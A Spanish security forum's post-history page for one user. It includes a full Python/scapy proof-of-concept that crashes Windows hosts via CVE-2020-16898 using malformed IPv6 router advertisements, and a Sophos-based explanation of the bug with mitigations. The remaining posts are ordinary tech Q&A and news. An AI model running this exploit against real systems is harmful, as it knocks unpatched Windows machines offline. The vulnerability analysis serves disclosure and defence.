Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - el-brujo

#1031
Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability

http://site.pi3.com.pl/exp/p_CVE-2020-16898.py


Código (python) [Seleccionar]
#!/usr/bin/env python3
#
# Proof-of-Concept / BSOD exploit for CVE-2020-16898 - Windows TCP/IP Remote Code Execution Vulnerability
#
# Author: Adam 'pi3' Zabrocki
# http://pi3.com.pl
#

from scapy.all import *

v6_dst = "fd12:db80:b052:0:7ca6:e06e:acc1:481b"
v6_src = "fe80::24f5:a2ff:fe30:8890"

p_test_half = 'A'.encode()*8 + b"\x18\x30" + b"\xFF\x18"
p_test = p_test_half + 'A'.encode()*4

c = ICMPv6NDOptEFA();

e = ICMPv6NDOptRDNSS()
e.len = 21
e.dns = [
"AAAA:AAAA:AAAA:AAAA:FFFF:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA",
"AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA:AAAA" ]

pkt = ICMPv6ND_RA() / ICMPv6NDOptRDNSS(len=8) / \
      Raw(load='A'.encode()*16*2 + p_test_half + b"\x18\xa0"*6) / c / e / c / e / c / e / c / e / c / e / e / e / e / e / e / e

p_test_frag = IPv6(dst=v6_dst, src=v6_src, hlim=255)/ \
              IPv6ExtHdrFragment()/pkt

l=fragment6(p_test_frag, 200)

for p in l:
    send(p)

#1032
Cita de: DAOST420 en 15 Octubre 2020, 06:40 AM
Hola tengo una pc con un athlon xp +2000 con un 1,5gb de ram con windows 7 y no puedo instalar ningun navegador intente con Mozilla, opera, Chrome canary y no puedo instalar ninguno. conocen algún navegador que pida menos requisitos que los que mencione.

¿Windows 7 con 1,5GB de RAM? Puedes instalar Firefox, Opera y Chrome, pero ése procesador es 32 bits, asi que nada de versiones 64 bits, tu Windows 7 debe ser 32b también
#1033
Estas vulnerabilidades, causadas por un error en el controlador TCP/IP de Windows, se remontan a la vulnerabilidad "Ping de la muerte" corregida en 2013. Hacen posible la denegación de servicio y la posible ejecución remota de código.

La vulnerabilidad en tcpip.sys, un error lógico en la forma en que el controlador analiza los mensajes ICMP, se puede activar de forma remota con un mensaje router advertisement IPv6 especialmente diseñado que contenga una opción de servidor DNS recursivo (RDNSS). La opción RDNSS normalmente contiene una lista de las direcciones IPv6 de uno o más servidores DNS recursivos.




Hay una falla lógica en tcpip.sys que puede explotarse creando un paquete de router advertisement que contenga más datos de los esperados, lo que da como resultado que el controlador coloque más bytes de datos en su pila de memoria de los previstos en el código del controlador, por lo que se produce un desbordamiento de búfer. En teoría, esto podría usarse tanto para denegación de servicio como para ataques de ejecución remota de código. Pero en la práctica, lograr la ejecución remota de código sería extremadamente difícil.

SophosLabs desarrolló su propia prueba de concepto para un ataque, basada en la información proporcionada por Microsoft. Aprovechando la vulnerabilidad para causar una "pantalla azul de la muerte" BSOD en el ordenador de la víctima. Los detalles de la POC no los publicamos por ahora para evitar la explotación por parte de ciberdelincuentes.

Una vez que entendimos el error, desarrollar una prueba de concepto de "Pantalla azul de la muerte" fue bastante sencillo. Pero llevarlo al nivel que Microsoft advirtió es posible (la ejecución remota de código) no es tan sencillo. Los estándares y prácticas de codificación modernas ralentizarían el esfuerzo por construir un exploit RCE genérico confiable, por dos razones.

Primero, TcpIp.sys se compila con bandera GS, que evita que un desbordamiento de pila típico controle directamente la dirección de retorno.



La cookie de pila, también conocida como canario de pila, es un valor aleatorio generado en el momento de la carga. Su valor es XOR con el puntero de pila, lo que hace que sea extremadamente difícil predecir de manera confiable, especialmente en una explotación remota completa.




Hay dos técnicas típicas que se utilizan para omitir los canarios de pila, ninguna de las cuales se aplica realmente en este caso:

   Usar otra vulnerabilidad de fuga de información (lectura arbitraria), que no ayudará mucho a explotar tcpdrv.sys, porque el valor canario es XOR con el puntero de pila.
   Sobrescritura de un controlador de manejo de excepciones estructurado (SEH), que sería útil solo si se ha establecido un registro de excepción estructurado, que no es el caso.

El segundo obstáculo para una explotación eficaz de la RCE es la aleatorización del diseño del espacio de direcciones del kernel (kASLR). Incluso si fuera posible, puede predecir de manera confiable el canario de la pila (bastante improbable) para regresar a un shell del sistema en modo de usuario que requeriría determinar correctamente (y nuevamente de forma remota) la dirección base del kernel de Windows.

Eso significa que incluso cuando la naturaleza exacta del error en tcpdrv.sys se haga más conocida, puede pasar algún tiempo antes de que alguien pueda explotarlo de una manera que inyecte código de manera confiable en el espacio del kernel de Windows. Aun así, la amenaza de denegación de servicio a voluntad con un paquete de fácil elaboración debería ser suficiente por sí sola para provocar un parcheo rápido, que es la única solución real para esta vulnerabilidad.

Otras mitigaciones a corto plazo para posibles ataques de denegación de servicio incluyen:

   Desactivar IPv6 si no se utiliza, o
   Obligar a Windows a descartar los paquetes de router advertisement usando el comando

netsh (netsh int ipv6 set int *INTERFACENUMBER* rabaseddnsconfig=disable).

[youtube=640,360]https://youtu.be/X5CzXuq8-3w[/youtube]


CitarIn a proof-of-concept published on October 13, 2020, the SophosLabs Offensive Security team demonstrates one possible exploit against a bug in Windows computers that can remotely execute code simply by sending a specially crafted IP version 6 packet at a vulnerable computer. While this demo does not show remote code executing, it does show that the exploit path for the bug is functional (but has been mitigated by protections Microsoft introduced into Windows 10) and demonstrates that this PoCg is capable of causing a "blue screen of death" on Windows computers, which may create other problems. With additional work, it will be possible, eventually, to execute arbitrary code without crashing the PC in the process.

Fuentes:
https://news.sophos.com/es-es/2020/10/14/la-razon-principal-para-instalar-los-parches-de-microsoft-de-octubre-de-2020-ping-de-la-muerte-redux/

https://blog.elhacker.net/2020/10/actualizaciones-de-seguridad-productos.html
#1034
Operadora   Sistema autónomo   Tipo de bloqueo
Movistar   3352   Inspección de paquetes con FortiGate
Vodafone   12430   Inspección de paquetes con Allot
Orange   12479   Bloqueo DNS resolviendo a 127.0.0.1
MásMóvil   15704   Inspección de paquetes
Yoigo   16299   Bloqueo DNS resolviendo a 192.168.1.254
Euskaltel   12338   Bloqueo DNS no resuelve

Las operadoras ejercen el bloqueo principalmente mediante dos sistemas. El primero y más sencillo es falseando la respuesta del servidor DNS, de forma que el usuario intenta acceder a una dirección IP que no tiene un servidor web escuchando, resultando en un error de navegación. Es el sistema utilizado por Orange, MásMóvil en la red móvil de Yoigo y Euskaltel.

El segundo método, mucho más efectivo, consiste en inspeccionar el tráfico del usuario analizando la conversación entre nuestro dispositivo y el servidor de destino para descubrir si estamos accediendo a una de las webs prohibidas. En ese caso se intercepta la comunicación enviándonos una respuesta falsa en forma de un HTML con un error. Es el sistema que utilizan Movistar, Vodafone y MásMóvil en su red fija. La inspección DPI es efectiva incluso cuando accedemos sobre HTTPS, al analizar el diálogo inicial en el que el navegador cliente manda en texto plano el nombre del dominio al que desea acceder.

Fuente:
https://bandaancha.eu/articulos/como-bloquean-webs-descarga-streaming-9760

En teoría cambiando las DNS de la operadora y utilizando ESNI en el navegador problema resuelto  ;-)



https://www.cloudflare.com/es-es/ssl/encrypted-sni/

Servidores DNS gratuitos y seguros, compatibles con DoH y DoT
https://blog.elhacker.net/2019/11/servidores-dns-gratuitos-y-seguros-compatibles-doh-dot-tls-https-firefox-chrome-android.html

Server Name Indication - SNI vs E-SNI
https://blog.elhacker.net/2020/08/china-esta-bloqueando-todo-el-trafico-web-https-tls-esni.html
#1035
Con una orden judicial, comunicando la IP al ISP se pueden obtener el domicilio de la personal.

Si se conecta a la Wifi de un vecino (no es la primera vez, ni la última vez que eso ocurre) pues el cuerpo policial (guardia civil, policía) es el encargado de investigarlo, hasta dar con él. Y no es tan difícil.
#1036
6 octubre 2020

Detenido en  España (Barcelona) John McAfee, será extraditado por evasión de impuestos con criptomonedas

Se le investiga por los delitos de evasión de impuestos y de omisión internacional de presentación de declaración de impuestos

El Departamento de Justicia de los EE.UU ha informado que el emprendedor está acusado de evasión de impuestos y fraude fiscal por valor de 23,1 millones de dólares en criptomonedas entre los años 2014 y 2018.

https://www.justice.gov/opa/pr/john-mcafee-indicted-tax-evasion
#1037
pues si, ya veo que widgets para el CMS WordPress  vas a encontrar muchos, pero código fuente HTML + JS  para insertar y hacer un embed de instagram es bastante más complicado.

En la documentación oficial de Facebook están todas las explicaciones, pero necesitas tokens, al más estilo de una API, para hacer todas las llamadas:
https://developers.facebook.com/docs/instagram/oembed

Tendrás que usar una web de terceros para insertar el código de Instagram para mostrar una cuenta en tu página web, tipo:

https://elfsight.com/instagram-feed-instashow/create/

Pero si sólo quieres insertar una publicación (embed) si puedes:

CitarPuedes obtener el código HTML de inserción de una publicación con vídeo o fotos de Instagram y utilizarlo para insertar la publicación en otros sitios web. El tamaño de las publicaciones insertadas cambia automáticamente para que se ajusten al contenedor y se vean geniales tanto en sitios web de escritorio como móviles.

https://developers.facebook.com/docs/instagram/embed-button
#1038
¿Qué herramientas has usado para hacer la ingeniería inversa de la app?


CitarAPKExtractor v4.2.9 de Meher Prasad (https://play.google.com/store/apps/details?id=com.ext.ui&hl=es)
    jadx v1.1.0 de skylot (https://github.com/skylot/jadx)

jadx permite decompilar directamente desde el APK y, en mi opinión, mejora la clásica combinación dex2jar + jd-gui.
#1039
mejor usar UEFI como bien dice Songoku. No es que sea más seguro, es que es más rápido, moderno, seguro, etc.

"Legacy" es un apaño para instalar Windows 7 y poco más.

Sería como el modo  AHCI a IDE:

Advanced > SATA configuration > SATA Mode = IDE Mode

No tiene sentido usar SATA con IDE hoy en día.

Lo malo es que un sistema instalado con Legacy mode, si intentas arrancar con UEFI puede ser que aparezca pantalla azul.

En el 2013 se habló sobre UEFI, pero ya han pasado unos años.

Diferencias entre UEFI vs BIOS (y MBR vs GPT)
https://blog.elhacker.net/2013/03/diferencias-entre-efi-vs-bios-mbr-vs-gpt-windows-linux-arranque-dual-grub.html
#1040
CitarComo youtube le esta bajando la calidad de emision a los videos del curso de reversing que estamos haciendo con @Solid_cls , pongo el link para el que quiere pueda bajar los videos originales en HD.

Ademas si alguien tiene mala velocidad de conexion muchas veces le cestra stremear bien o se ve mal, bajandolos despacio una vez que los tiene los puede ver en HD perfecto.

https://twitter.com/ricnar456/status/1312041044708556803